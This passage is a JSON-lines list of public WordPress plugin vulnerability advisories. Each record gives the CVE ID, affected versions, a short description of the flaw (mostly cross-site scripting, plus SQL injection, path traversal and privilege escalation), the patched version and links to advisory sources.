\\/tags\\\/2.8.0\\\/Generic_Plugin_Admin.php#L212\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329ad5dc-9339-4540-aba3-f21a78a74d4b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/329ad5dc-9339-4540-aba3-f21a78a74d4b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-2094","slug":"yellow-yard","versionEndExcluding":"2.8.2","description":"The Yellow Yard Searchbar WordPress plugin before 2.8.2 does not escape some URL parameters before outputting them back to the user, leading to Reflected Cross-Site Scripting","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9a106e1-29ae-47ad-907b-01086af3d3fb\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c9a106e1-29ae-47ad-907b-01086af3d3fb\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7067","slug":"woolentor-addons","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The ShopLentor \u2013 WooCommerce Builder for Elementor & Gutenberg +10 Modules \u2013 All in One Solution (formerly WooLentor) plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'woolentor_template_store' function in all versions up to, and including, 2.8.1. This makes it possible for authenticated attackers, with contributor access and above, to obtain the nonce used to reach this function and set a blank template as the default template.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860c2339-b2a9-4a4e-a186-07a5fb042b06?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/860c2339-b2a9-4a4e-a186-07a5fb042b06?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044764\\\/woolentor-addons\\\/trunk?contextall=1&old=3037382&old_path=%2Fwoolentor-addons%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3044764\\\/woolentor-addons\\\/trunk?contextall=1&old=3037382&old_path=%2Fwoolentor-addons%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1166","slug":"ultimate-social-media-icons","versionEndExcluding":"2.8.2","description":"The USM-Premium WordPress plugin before 16.3 does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example, in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/825eccf9-f351-4a5b-b238-9969141b94fa\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/825eccf9-f351-4a5b-b238-9969141b94fa\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12599","slug":"ht-mega-for-elementor","versionImpact":"2.8.1","versionEndExcluding":"2.8.2","description":"The HT Mega \u2013 Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 2.8.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234495\\\/ht-mega-for-elementor\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3234495\\\/ht-mega-for-elementor\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20a67cde-612a-4c57-83d6-a5d8f3716a2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/20a67cde-612a-4c57-83d6-a5d8f3716a2d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13349","slug":"stockdio-historical-chart","versionImpact":"2.8.18","versionEndExcluding":"2.8.19","description":"The Stockdio Historical Chart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'stockdio-historical-chart' shortcode in all versions up to, and including, 2.8.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.19, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stockdio-historical-chart\\\/trunk\\\/stockdioplugin.php#L1155\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/stockdio-historical-chart\\\/trunk\\\/stockdioplugin.php#L1155\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stockdio-historical-chart\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/stockdio-historical-chart\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf476a8-e341-44d4-988c-a7fb3fb538d1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ecf476a8-e341-44d4-988c-a7fb3fb538d1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12299","slug":"system-dashboard","versionImpact":"2.8.17","versionEndExcluding":"2.8.18","description":"The System Dashboard plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the Filename parameter in all versions up to, and including, 2.8.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick an administrative user into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.15\\\/admin\\\/class-system-dashboard-admin.php#L2323\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/system-dashboard\\\/tags\\\/2.8.15\\\/admin\\\/class-system-dashboard-admin.php#L2323\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/993670b7-a3ea-497d-ad46-881bd47b9346?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/993670b7-a3ea-497d-ad46-881bd47b9346?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6569","slug":"forms-for-campaign-monitor","versionImpact":"2.8.15","versionEndExcluding":"2.8.16","description":"The Campaign Monitor for WordPress plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 2.8.15. This is due to the plugin not properly restricting direct access to \/forms\/views\/admin\/create.php and display_errors being enabled. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 2.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babf88c4-6328-4ba2-97e4-e1eaaa549dbb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/babf88c4-6328-4ba2-97e4-e1eaaa549dbb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-for-campaign-monitor\\\/trunk\\\/forms\\\/views\\\/admin\\\/create.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/forms-for-campaign-monitor\\\/trunk\\\/forms\\\/views\\\/admin\\\/create.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125580%40forms-for-campaign-monitor&new=3125580%40forms-for-campaign-monitor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3125580%40forms-for-campaign-monitor&new=3125580%40forms-for-campaign-monitor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12038","slug":"buddyforms","versionImpact":"2.8.15","versionEndExcluding":"2.8.16","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'buddyforms_nav' shortcode in all versions up to, and including, 2.8.15 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.16, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244167\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3244167\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff0568e2-3a1e-4ed6-835a-37e3d07d7b63?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ff0568e2-3a1e-4ed6-835a-37e3d07d7b63?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11107","slug":"system-dashboard","versionImpact":"2.8.14","versionEndExcluding":"2.8.15","description":"The System Dashboard WordPress plugin before 2.8.15 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 2.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a89f1117-8df3-417b-b54f-6587545833ee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a89f1117-8df3-417b-b54f-6587545833ee\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10708","slug":"system-dashboard","versionImpact":"2.8.14","versionEndExcluding":"2.8.15","description":"The System Dashboard WordPress plugin before 2.8.15 does not validate user input used in a path, which could allow high privilege users such as admin to perform path traversal attacks and read arbitrary files on the server.","recommendation":"Update to version 2.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/61d750a5-8c2c-4c94-a1a9-6a254c2a0d03\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-38474","slug":"forms-for-campaign-monitor","versionEndExcluding":"2.8.14","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Campaign Monitor Campaign Monitor for WordPress allows Reflected XSS. This issue affects Campaign Monitor for WordPress: from n\/a through 2.8.12.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-for-campaign-monitor\\\/wordpress-campaign-monitor-for-wordpress-plugin-2-8-12-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/forms-for-campaign-monitor\\\/wordpress-campaign-monitor-for-wordpress-plugin-2-8-12-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12037","slug":"buddyforms","versionImpact":"2.8.13","versionEndExcluding":"2.8.14","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'bf_new_submission_link' shortcode in all versions up to, and including, 2.8.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231602\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3231602\\\/buddyforms\\\/trunk\\\/includes\\\/shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/accd4f34-4e10-4c83-96c3-c2a078ecd5cc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/accd4f34-4e10-4c83-96c3-c2a078ecd5cc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6200","slug":"geodirectory","versionImpact":"2.8.119","versionEndExcluding":"2.8.120","description":"The GeoDirectory WordPress plugin before 2.8.120 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"Update to version 2.8.120, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27c35255-4963-4d93-85e7-9e7688e5eb2e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27c35255-4963-4d93-85e7-9e7688e5eb2e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8246","slug":"buddyforms","versionImpact":"2.8.11","versionEndExcluding":"2.8.12","description":"The Post Form \u2013 Registration Form \u2013 Profile Form for User Profiles \u2013 Frontend Content Forms for User Submissions (UGC) plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 2.8.11. This is due to plugin not properly restricting what users have access to set the default role on registration forms. This makes it possible for authenticated attackers, with contributor-level access and above, to create a registration form with a custom role that allows them to register as administrators.","recommendation":"Update to version 2.8.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40760f60-b81a-447b-a2c8-83c7666ce410?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40760f60-b81a-447b-a2c8-83c7666ce410?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149760\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/form-builder\\\/meta-boxes\\\/metabox-registration.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3149760\\\/buddyforms\\\/trunk\\\/includes\\\/admin\\\/form-builder\\\/meta-boxes\\\/metabox-registration.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1110","slug":"yellow-yard","versionEndExcluding":"2.8.12","description":"The Yellow Yard Searchbar WordPress plugin before 2.8.12 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embedded, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1830e829-4a43-4d98-8214-eecec6bef694\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1830e829-4a43-4d98-8214-eecec6bef694\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2840","slug":"enhanced-media-library","versionImpact":"2.8.9","versionEndExcluding":"2.8.10","description":"The Enhanced Media Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via media upload functionality in all versions up to, and including, 2.8.9 due to the plugin allowing 'dfxp' files to be uploaded. This makes it possible for authenticated attackers, with author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b30ecb-e3ce-4092-841b-3a1b2553596a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/15b30ecb-e3ce-4092-841b-3a1b2553596a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/enhanced-media-library\\\/tags\\\/2.8.9&new_path=\\\/enhanced-media-library\\\/tags\\\/2.8.10&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?old_path=\\\/enhanced-media-library\\\/tags\\\/2.8.9&new_path=\\\/enhanced-media-library\\\/tags\\\/2.8.10&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7246","slug":"system-dashboard","versionImpact":"2.8.9","versionEndExcluding":"2.8.10","description":"The System Dashboard WordPress plugin before 2.8.10 does not sanitize and escape some parameters, which could allow administrators in multisite WordPress configurations to perform Cross-Site Scripting attacks","recommendation":"Update to version 2.8.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7413d5ec-10a7-4cb8-ac1c-4ef554751518\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7413d5ec-10a7-4cb8-ac1c-4ef554751518\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4430","slug":"beaver-builder-lite-version","versionImpact":"2.8.1.2","versionEndExcluding":"2.8.1.3","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the photo widget crop attribute in all versions up to, and including, 2.8.1.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.1.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ed285-f215-44d3-9db9-9b2bfffee60a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cd6ed285-f215-44d3-9db9-9b2bfffee60a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3083534%40beaver-builder-lite-version%2Ftrunk&old=3078825%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3083534%40beaver-builder-lite-version%2Ftrunk&old=3078825%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"name\":\"https:\\\/\\\/www.wpbeaverbuilder.com\\\/change-logs\\\/?utm_medium=bb-lite&utm_source=repo-readme&utm_campaign=repo-changelog-page\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3923","slug":"beaver-builder-lite-version","versionImpact":"2.8.1.1","versionEndExcluding":"2.8.1.2","description":"The Beaver Builder \u2013 WordPress Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the link_target parameter in all versions up to, and including, 2.8.1.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.1.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99960ff7-62e1-4c44-ae8e-ebda3e075781?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/99960ff7-62e1-4c44-ae8e-ebda3e075781?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.8.0.7\\\/modules\\\/button\\\/includes\\\/frontend.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beaver-builder-lite-version\\\/tags\\\/2.8.0.7\\\/modules\\\/button\\\/includes\\\/frontend.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078825%40beaver-builder-lite-version%2Ftrunk&old=3062187%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3078825%40beaver-builder-lite-version%2Ftrunk&old=3062187%40beaver-builder-lite-version%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10882","slug":"product-delivery-date-for-woocommerce-lite","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"The Product Delivery Date for WooCommerce \u2013 Lite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg & remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 2.8.0. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e47daed-42cc-4d96-82a1-a3e65af9fa88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0e47daed-42cc-4d96-82a1-a3e65af9fa88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.5\\\/includes\\\/admin\\\/class-prdd-lite-view-deliveries-table.php#L129\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/product-delivery-date-for-woocommerce-lite\\\/tags\\\/2.7.5\\\/includes\\\/admin\\\/class-prdd-lite-view-deliveries-table.php#L129\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185534%40product-delivery-date-for-woocommerce-lite&new=3185534%40product-delivery-date-for-woocommerce-lite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3185534%40product-delivery-date-for-woocommerce-lite&new=3185534%40product-delivery-date-for-woocommerce-lite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2223","slug":"login-rebuilder","versionEndExcluding":"2.8.1","description":"The Login rebuilder WordPress plugin before 2.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b356b82-5d03-4f70-b4ce-f1405304bb52\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7b356b82-5d03-4f70-b4ce-f1405304bb52\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11807","slug":"nps-computy","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"The NPS computy plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'data1' and 'data2' parameters in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198661%40nps-computy%2Ftrunk&old=3141365%40nps-computy%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3198661%40nps-computy%2Ftrunk&old=3141365%40nps-computy%2Ftrunk&sfp_email=&sfph_mail=#file0\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fabeeba6-f3c0-4f9c-a12f-c97801aad810?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fabeeba6-f3c0-4f9c-a12f-c97801aad810?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-47334","slug":"zoho-flow","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Zoho Flow Zoho Flow for WordPress allows SQL Injection. This issue affects Zoho Flow for WordPress: from n\/a through 2.7.1.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-flow\\\/wordpress-zoho-flow-plugin-2-7-1-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/zoho-flow\\\/wordpress-zoho-flow-plugin-2-7-1-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13461","slug":"autoship-cloud","versionImpact":"2.8.0","versionEndExcluding":"2.8.1","description":"The Autoship Cloud for WooCommerce Subscription Products plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'autoship-create-scheduled-order-action' shortcode in all versions up to, and including, 2.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242136%40autoship-cloud&new=3242136%40autoship-cloud&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242136%40autoship-cloud&new=3242136%40autoship-cloud&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ae16c4e-0151-4414-8612-ec8eb92505fd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ae16c4e-0151-4414-8612-ec8eb92505fd?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13402","slug":"buddyboss-platform","versionImpact":"2.7.70","versionEndExcluding":"2.8.00","description":"The Buddyboss Platform plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018link_title\u2019 parameter in all versions up to, and including, 2.7.70 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 2.8.00, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-releases\\\/2-8-00\\\/\",\"name\":\"https:\\\/\\\/www.buddyboss.com\\\/resources\\\/buddyboss-platform-releases\\\/2-8-00\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42743c2f-053b-4f14-bf11-865f978ec017?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/42743c2f-053b-4f14-bf11-865f978ec017?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
